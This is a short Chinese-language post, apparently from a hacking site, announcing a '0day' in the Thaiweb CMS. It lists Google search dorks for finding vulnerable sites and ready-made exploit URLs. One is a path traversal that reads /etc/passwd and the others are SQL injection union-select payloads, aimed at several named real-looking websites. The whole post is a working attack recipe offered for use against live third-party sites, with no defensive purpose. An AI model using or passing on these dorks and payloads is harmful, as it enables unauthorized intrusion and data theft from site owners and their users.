Thaiweb远程文件sql注入漏洞0day

Google之:
intext:powered by Thaiweb
inurl:index.php?page=board.php
利用点1:http://www.hack1990.com/index.php?page=../../../../../../../../../../../../../etc/passwd
利用点2:http://www.hack1990.com/index.php?page=boardque.php&bod_id=4′
http://www.keytasin.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316 —
http://www.autopartnerthailand.com
/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316 —
http://gift.in.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316 —

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录